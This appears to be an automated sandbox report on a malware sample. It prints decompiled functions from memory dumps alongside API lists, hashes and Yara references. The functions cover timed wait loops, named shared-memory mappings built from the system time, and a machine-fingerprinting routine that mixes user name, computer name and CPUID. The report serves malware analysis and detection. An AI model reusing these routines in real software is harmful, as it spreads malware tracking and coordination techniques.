                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3963266935-1536154274
                                                                                                                                                                                                                                • Opcode ID: 0f1ff083681292a16bcd762eaddee5b543eb6802fa1820c1f08ca20b8ab47ca3
                                                                                                                                                                                                                                • Instruction ID: 0fe151224fb52e07829b1483604e241e532a5680d2ffc65fef00c9a3da11828e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f1ff083681292a16bcd762eaddee5b543eb6802fa1820c1f08ca20b8ab47ca3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5619F71D80206AFC723DB64ED44FAA3BA8FF48380F050825F945D3251DBB9E926DB65
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB9FF2, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 150timememoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                			E02BB9FF2(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2bbd278);
					_v20 = 0;
					_v16 = 0;
					L02BBAEC0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x2bbd2a4; // 0x2d8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2bbd284 = 5;
						} else {
							_t68 = E02BB2932(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x2bbd298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E02BB462F(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E02BB516C(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2bbd27c);
							goto L21;
						} else {
							__eflags =  *0x2bbd280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02BB651D();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2bbd280);
								L21:
								L02BBAEC0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x2bbd270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                                                                                                                                                                                                0x02bb9ff2
                                                                                                                                                                                                                                0x02bba004
                                                                                                                                                                                                                                0x02bba007
                                                                                                                                                                                                                                0x02bba013
                                                                                                                                                                                                                                0x02bba019
                                                                                                                                                                                                                                0x02bba01e
                                                                                                                                                                                                                                0x02bba185
                                                                                                                                                                                                                                0x02bba024
                                                                                                                                                                                                                                0x02bba024
                                                                                                                                                                                                                                0x02bba026
                                                                                                                                                                                                                                0x02bba02b
                                                                                                                                                                                                                                0x02bba02c
                                                                                                                                                                                                                                0x02bba032
                                                                                                                                                                                                                                0x02bba035
                                                                                                                                                                                                                                0x02bba038
                                                                                                                                                                                                                                0x02bba046
                                                                                                                                                                                                                                0x02bba051
                                                                                                                                                                                                                                0x02bba054
                                                                                                                                                                                                                                0x02bba056
                                                                                                                                                                                                                                0x02bba063
                                                                                                                                                                                                                                0x02bba06d
                                                                                                                                                                                                                                0x02bba06f
                                                                                                                                                                                                                                0x02bba074
                                                                                                                                                                                                                                0x02bba079
                                                                                                                                                                                                                                0x02bba084
                                                                                                                                                                                                                                0x02bba084
                                                                                                                                                                                                                                0x02bba07b
                                                                                                                                                                                                                                0x02bba07b
                                                                                                                                                                                                                                0x02bba082
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba082
                                                                                                                                                                                                                                0x02bba08e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba091
                                                                                                                                                                                                                                0x02bba095
                                                                                                                                                                                                                                0x02bba0a0
                                                                                                                                                                                                                                0x02bba0a0
                                                                                                                                                                                                                                0x02bba0a7
                                                                                                                                                                                                                                0x02bba0b0
                                                                                                                                                                                                                                0x02bba0b7
                                                                                                                                                                                                                                0x02bba0c0
                                                                                                                                                                                                                                0x02bba0c3
                                                                                                                                                                                                                                0x02bba0c6
                                                                                                                                                                                                                                0x02bba0cb
                                                                                                                                                                                                                                0x02bba0d0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba0d2
                                                                                                                                                                                                                                0x02bba0d5
                                                                                                                                                                                                                                0x02bba0d8
                                                                                                                                                                                                                                0x02bba0db
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba0dd
                                                                                                                                                                                                                                0x02bba0ec
                                                                                                                                                                                                                                0x02bba0ec
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba11a
                                                                                                                                                                                                                                0x02bba11a
                                                                                                                                                                                                                                0x02bba11f
                                                                                                                                                                                                                                0x02bba13e
                                                                                                                                                                                                                                0x02bba140
                                                                                                                                                                                                                                0x02bba145
                                                                                                                                                                                                                                0x02bba146
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba121
                                                                                                                                                                                                                                0x02bba121
                                                                                                                                                                                                                                0x02bba127
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba129
                                                                                                                                                                                                                                0x02bba129
                                                                                                                                                                                                                                0x02bba12e
                                                                                                                                                                                                                                0x02bba130
                                                                                                                                                                                                                                0x02bba135
                                                                                                                                                                                                                                0x02bba136
                                                                                                                                                                                                                                0x02bba14c
                                                                                                                                                                                                                                0x02bba14c
                                                                                                                                                                                                                                0x02bba154
                                                                                                                                                                                                                                0x02bba15f
                                                                                                                                                                                                                                0x02bba162
                                                                                                                                                                                                                                0x02bba16d
                                                                                                                                                                                                                                0x02bba16f
                                                                                                                                                                                                                                0x02bba172
                                                                                                                                                                                                                                0x02bba174
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba17a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba17a
                                                                                                                                                                                                                                0x02bba174
                                                                                                                                                                                                                                0x02bba127
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba11f
                                                                                                                                                                                                                                0x02bba0ef
                                                                                                                                                                                                                                0x02bba0f1
                                                                                                                                                                                                                                0x02bba0f4
                                                                                                                                                                                                                                0x02bba0f5
                                                                                                                                                                                                                                0x02bba0f5
                                                                                                                                                                                                                                0x02bba0f9
                                                                                                                                                                                                                                0x02bba103
                                                                                                                                                                                                                                0x02bba103
                                                                                                                                                                                                                                0x02bba109
                                                                                                                                                                                                                                0x02bba10c
                                                                                                                                                                                                                                0x02bba10c
                                                                                                                                                                                                                                0x02bba112
                                                                                                                                                                                                                                0x02bba112
                                                                                                                                                                                                                                0x02bba18f
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BBA007
                                                                                                                                                                                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02BBA013
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02BBA038
                                                                                                                                                                                                                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 02BBA054
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BBA06D
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BBA103
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02BBA112
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02BBA14C
                                                                                                                                                                                                                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02BB58BD,?), ref: 02BBA162
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BBA16D
                                                                                                                                                                                                                                  • Part of subcall function 02BB2932: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052F9370,00000000,?,747DF710,00000000,747DF730), ref: 02BB2981
                                                                                                                                                                                                                                  • Part of subcall function 02BB2932: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052F93A8,?,00000000,30314549,00000014,004F0053,052F9364), ref: 02BB2A1E
                                                                                                                                                                                                                                  • Part of subcall function 02BB2932: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BBA080), ref: 02BB2A30
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BBA17F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3521023985-2342693527
                                                                                                                                                                                                                                • Opcode ID: 1ece691c3b4332970714ce2e756eeb03e0f5897b8225ffbb3baba657d888decc
                                                                                                                                                                                                                                • Instruction ID: daf1404ae69601d0cd7a14ce8016f74452bb0d9944db9289b1145f4bd08eed21
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ece691c3b4332970714ce2e756eeb03e0f5897b8225ffbb3baba657d888decc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24515BB1C01229AFCF12DFA4DC44DEEBFB9EF09360F604656F454A2180D7B49A54CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B81210, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81filetimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 69%
                                                                                                                                                                                                                                			E02B81210(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L02B82160();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x2b841c4;
				_push(_t15 + 0x2b8505e);
				_push(_t15 + 0x2b85054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L02B8215A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x2b841c8, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                                                                                                                                                0x02b81210
                                                                                                                                                                                                                                0x02b81219
                                                                                                                                                                                                                                0x02b8121d
                                                                                                                                                                                                                                0x02b81223
                                                                                                                                                                                                                                0x02b81228
                                                                                                                                                                                                                                0x02b8122d
                                                                                                                                                                                                                                0x02b81230
                                                                                                                                                                                                                                0x02b81233
                                                                                                                                                                                                                                0x02b81238
                                                                                                                                                                                                                                0x02b81239
                                                                                                                                                                                                                                0x02b8123c
                                                                                                                                                                                                                                0x02b81247
                                                                                                                                                                                                                                0x02b8124e
                                                                                                                                                                                                                                0x02b81252
                                                                                                                                                                                                                                0x02b81254
                                                                                                                                                                                                                                0x02b81255
                                                                                                                                                                                                                                0x02b81258
                                                                                                                                                                                                                                0x02b8125d
                                                                                                                                                                                                                                0x02b81267
                                                                                                                                                                                                                                0x02b81269
                                                                                                                                                                                                                                0x02b81269
                                                                                                                                                                                                                                0x02b8127d
                                                                                                                                                                                                                                0x02b81283
                                                                                                                                                                                                                                0x02b81287
                                                                                                                                                                                                                                0x02b812d7
                                                                                                                                                                                                                                0x02b81289
                                                                                                                                                                                                                                0x02b81292
                                                                                                                                                                                                                                0x02b812a8
                                                                                                                                                                                                                                0x02b812b0
                                                                                                                                                                                                                                0x02b812c2
                                                                                                                                                                                                                                0x02b812c6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b812b2
                                                                                                                                                                                                                                0x02b812b5
                                                                                                                                                                                                                                0x02b812ba
                                                                                                                                                                                                                                0x02b812bc
                                                                                                                                                                                                                                0x02b812bc
                                                                                                                                                                                                                                0x02b8129d
                                                                                                                                                                                                                                0x02b8129f
                                                                                                                                                                                                                                0x02b812c8
                                                                                                                                                                                                                                0x02b812c9
                                                                                                                                                                                                                                0x02b812c9
                                                                                                                                                                                                                                0x02b81292
                                                                                                                                                                                                                                0x02b812df

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,02B810DD,0000000A,?,?), ref: 02B8121D
                                                                                                                                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02B81233
                                                                                                                                                                                                                                • _snwprintf.NTDLL ref: 02B81258
                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,02B841C8,00000004,00000000,?,?), ref: 02B8127D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02B810DD,0000000A,?), ref: 02B81294
                                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 02B812A8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02B810DD,0000000A,?), ref: 02B812C0
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,02B810DD,0000000A), ref: 02B812C9
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02B810DD,0000000A,?), ref: 02B812D1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1724014008-1084903527
                                                                                                                                                                                                                                • Opcode ID: 1536202e55bc7fd05dcc13d6f7ae0b11ff5fe1472fd4b48f7f39795e95d1b451
                                                                                                                                                                                                                                • Instruction ID: 25845927d8603a444477181d585098f18e0dc6c32e78177fad668680bfdfcc55
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1536202e55bc7fd05dcc13d6f7ae0b11ff5fe1472fd4b48f7f39795e95d1b451
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9921A1B2A41108AFDB11BFA8CC84EAE77EDEB44794F1144A5FA0DE7180D7309946CF61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB1DF5, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E02BB1DF5(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02BBAEBA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2bbd2e0; // 0x273a5a8
				_t5 = _t13 + 0x2bbe876; // 0x52f8e1e
				_t6 = _t13 + 0x2bbe59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02BBABDA();
				_t17 = CreateFileMappingW(0xffffffff, 0x2bbd2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                                                                                                                                                                0x02bb1df5
                                                                                                                                                                                                                                0x02bb1dfd
                                                                                                                                                                                                                                0x02bb1e01
                                                                                                                                                                                                                                0x02bb1e07
                                                                                                                                                                                                                                0x02bb1e0c
                                                                                                                                                                                                                                0x02bb1e11
                                                                                                                                                                                                                                0x02bb1e14
                                                                                                                                                                                                                                0x02bb1e17
                                                                                                                                                                                                                                0x02bb1e1c
                                                                                                                                                                                                                                0x02bb1e1d
                                                                                                                                                                                                                                0x02bb1e20
                                                                                                                                                                                                                                0x02bb1e25
                                                                                                                                                                                                                                0x02bb1e2c
                                                                                                                                                                                                                                0x02bb1e36
                                                                                                                                                                                                                                0x02bb1e38
                                                                                                                                                                                                                                0x02bb1e39
                                                                                                                                                                                                                                0x02bb1e3c
                                                                                                                                                                                                                                0x02bb1e58
                                                                                                                                                                                                                                0x02bb1e5e
                                                                                                                                                                                                                                0x02bb1e62
                                                                                                                                                                                                                                0x02bb1eb0
                                                                                                                                                                                                                                0x02bb1e64
                                                                                                                                                                                                                                0x02bb1e71
                                                                                                                                                                                                                                0x02bb1e81
                                                                                                                                                                                                                                0x02bb1e89
                                                                                                                                                                                                                                0x02bb1e9b
                                                                                                                                                                                                                                0x02bb1e9f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb1e8b
                                                                                                                                                                                                                                0x02bb1e8e
                                                                                                                                                                                                                                0x02bb1e93
                                                                                                                                                                                                                                0x02bb1e95
                                                                                                                                                                                                                                0x02bb1e95
                                                                                                                                                                                                                                0x02bb1e73
                                                                                                                                                                                                                                0x02bb1e75
                                                                                                                                                                                                                                0x02bb1ea1
                                                                                                                                                                                                                                0x02bb1ea2
                                                                                                                                                                                                                                0x02bb1ea2
                                                                                                                                                                                                                                0x02bb1e71
                                                                                                                                                                                                                                0x02bb1eb7

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02BB5790,?,?,4D283A53,?,?), ref: 02BB1E01
                                                                                                                                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02BB1E17
                                                                                                                                                                                                                                • _snwprintf.NTDLL ref: 02BB1E3C
                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,02BBD2E4,00000004,00000000,00001000,?), ref: 02BB1E58
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BB5790,?,?,4D283A53), ref: 02BB1E6A
                                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 02BB1E81
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BB5790,?,?), ref: 02BB1EA2
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BB5790,?,?,4D283A53), ref: 02BB1EAA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1814172918-1701360479
                                                                                                                                                                                                                                • Opcode ID: 0db903375d74cc2196f0e0c18c862a7027f89a9aa8642a396da4fbb3cd94cab5
                                                                                                                                                                                                                                • Instruction ID: a6f4e27adabc05ccbd646e701e0ed48b1235ea3e69f5c15671bccea796c21c21
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0db903375d74cc2196f0e0c18c862a7027f89a9aa8642a396da4fbb3cd94cab5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D21AE76A40204BFD723DB68CC45FEE3BA9AF84794F214166F609A7190D7F0E905CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB9DE1, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E02BB9DE1(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2bbd2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02BB4E13( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2bbd2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2bbd270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02BB680B(_v8 + _v8, _t64);
							}
							HeapFree( *0x2bbd270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2bbd270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02BB680B(_v8 + _v8, _t64);
						}
						HeapFree( *0x2bbd270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                                                                                                                                                                                                0x02bb9de1
                                                                                                                                                                                                                                0x02bb9de9
                                                                                                                                                                                                                                0x02bb9ded
                                                                                                                                                                                                                                0x02bb9df0
                                                                                                                                                                                                                                0x02bb9df5
                                                                                                                                                                                                                                0x02bb9df7
                                                                                                                                                                                                                                0x02bb9dfc
                                                                                                                                                                                                                                0x02bb9dfc
                                                                                                                                                                                                                                0x02bb9e02
                                                                                                                                                                                                                                0x02bb9e04
                                                                                                                                                                                                                                0x02bb9e11
                                                                                                                                                                                                                                0x02bb9e72
                                                                                                                                                                                                                                0x02bb9e13
                                                                                                                                                                                                                                0x02bb9e18
                                                                                                                                                                                                                                0x02bb9e1e
                                                                                                                                                                                                                                0x02bb9e23
                                                                                                                                                                                                                                0x02bb9e31
                                                                                                                                                                                                                                0x02bb9e35
                                                                                                                                                                                                                                0x02bb9e44
                                                                                                                                                                                                                                0x02bb9e4b
                                                                                                                                                                                                                                0x02bb9e52
                                                                                                                                                                                                                                0x02bb9e52
                                                                                                                                                                                                                                0x02bb9e5d
                                                                                                                                                                                                                                0x02bb9e5d
                                                                                                                                                                                                                                0x02bb9e35
                                                                                                                                                                                                                                0x02bb9e23
                                                                                                                                                                                                                                0x02bb9e74
                                                                                                                                                                                                                                0x02bb9e7a
                                                                                                                                                                                                                                0x02bb9e84
                                                                                                                                                                                                                                0x02bb9e86
                                                                                                                                                                                                                                0x02bb9e8b
                                                                                                                                                                                                                                0x02bb9e9a
                                                                                                                                                                                                                                0x02bb9e9e
                                                                                                                                                                                                                                0x02bb9ea9
                                                                                                                                                                                                                                0x02bb9eb0
                                                                                                                                                                                                                                0x02bb9eb7
                                                                                                                                                                                                                                0x02bb9eb7
                                                                                                                                                                                                                                0x02bb9ec3
                                                                                                                                                                                                                                0x02bb9ec3
                                                                                                                                                                                                                                0x02bb9e9e
                                                                                                                                                                                                                                0x02bb9ece
                                                                                                                                                                                                                                0x02bb9ed0
                                                                                                                                                                                                                                0x02bb9ed3
                                                                                                                                                                                                                                0x02bb9ed5
                                                                                                                                                                                                                                0x02bb9ed8
                                                                                                                                                                                                                                0x02bb9edb
                                                                                                                                                                                                                                0x02bb9ee5
                                                                                                                                                                                                                                0x02bb9ee9
                                                                                                                                                                                                                                0x02bb9eed

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 02BB9E18
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 02BB9E2F
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 02BB9E3C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02BB587F), ref: 02BB9E5D
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BB9E84
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02BB9E98
